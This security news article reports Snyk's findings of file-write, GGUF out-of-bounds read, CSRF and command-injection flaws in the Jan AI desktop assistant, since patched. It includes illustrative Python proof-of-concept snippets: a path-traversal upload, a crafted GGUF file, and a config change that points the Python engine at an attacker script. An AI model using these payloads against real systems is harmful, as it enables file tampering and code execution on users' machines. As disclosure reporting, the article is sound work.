Jan AI, an open-source ChatGPT alternative developed by Menlo Research, contains multiple vulnerabilities that expose users' systems to remote manipulation. The flaws, uncovered by security platform Snyk, are reachable by unauthenticated attackers because Jan AI's local server exposes its API without any authentication. Jan AI is a personal assistant that runs offline on desktops and mobile devices, giving users control over AI models without relying on cloud hosting.
Snyk’s analysis revealed a critical flaw in Jan AI’s file-upload function, which lacked proper input sanitization, allowing a malicious webpage to write arbitrary files to the user’s system.
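As a rough sketch of how an unsanitized upload can be abused, the Python snippet below submits a multipart request whose filename embeds path-traversal sequences; a server that joins the unsanitized name onto its upload directory would write the file outside that directory. The port, endpoint path, and form field are assumptions for illustration, not confirmed details of Jan AI's API.

```python
import requests

# Hypothetical local Jan AI server; the port and endpoint are assumptions.
JAN_API = "http://127.0.0.1:1337/v1/files"

# A filename containing "../" sequences: if the server concatenates it onto
# its upload directory without sanitization, the file lands outside that
# directory (classic path traversal leading to arbitrary file write).
malicious_name = "../../../../tmp/pwned.txt"

files = {
    # (filename, file content, content type)
    "file": (malicious_name, b"attacker-controlled content", "text/plain"),
}

# No credentials are attached: the API exposes no authentication, so any
# local process can issue this request.
resp = requests.post(JAN_API, files=files)
print(resp.status_code, resp.text)
```

A malicious webpage could have the victim's browser issue an equivalent request, since the server accepts it without credentials.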
Further vulnerabilities were identified in Jan AI’s GGUF parser, and a lack of cross-site request forgery (CSRF) protection left the server’s non-GET endpoints open to requests forged by malicious webpages. Together, these weaknesses allow attackers to manipulate server configuration and to leak data through out-of-bounds reads triggered by crafted GGUF files.
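To illustrate the parser side of this, the sketch below builds a minimal GGUF file whose header declares a metadata-key length far larger than the file itself, the classic setup for an out-of-bounds read in a parser that trusts declared lengths. The report does not specify which field Jan AI's parser mishandled, so this is a generic example against the public GGUF layout.

```python
import struct

# GGUF header per the public spec: magic, version, tensor count,
# metadata key/value count (all little-endian).
header = b"GGUF"
header += struct.pack("<I", 3)   # version 3
header += struct.pack("<Q", 0)   # tensor_count = 0
header += struct.pack("<Q", 1)   # metadata_kv_count = 1

# First metadata key: a GGUF string is a uint64 length followed by bytes.
# Declare a length of 1 GiB but supply only four bytes; a parser that
# trusts the declared length will read far past the end of its buffer.
bogus_len = 1 << 30
key = struct.pack("<Q", bogus_len) + b"oops"

with open("crafted.gguf", "wb") as f:
    f.write(header + key)
```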
Additionally, Jan AI’s Python-engine functionality exposes it to remote code execution (RCE). The path to the Python binary used to launch a model is taken from the model’s configuration, so an attacker who updates that configuration can inject an arbitrary command that executes when the model starts.
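The report does not publish the exact request, but a hypothetical version of such a configuration update might look like the following; the endpoint, model name, and python_path field are all assumptions made for illustration.

```python
import requests

# Hypothetical endpoint and field names; the real API surface may differ.
JAN_API = "http://127.0.0.1:1337/v1/models/some-python-model"

# Point the engine's "Python binary" at an attacker-chosen command. When
# Jan AI later starts the model, it launches this path instead of a real
# Python interpreter, yielding command execution.
payload = {
    "engine": "python",
    "python_path": "/tmp/evil.sh",  # hypothetical field name
}

resp = requests.post(JAN_API, json=payload)
print(resp.status_code, resp.text)
```

With CSRF protection missing on non-GET endpoints, a request of this shape would not even require the attacker to run code on the machine: a webpage could forge it from the victim's browser.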
These vulnerabilities are especially concerning because they could allow attackers to control or disable key server features on a machine its owner believes is operating entirely offline.
Menlo Research responded quickly after Snyk reported the findings in February 2025: by March 6, all of the issues had been fixed in the latest Jan AI release, and four CVEs were issued to track the flaws, covering arbitrary file write, out-of-bounds read, command injection, and missing CSRF protection.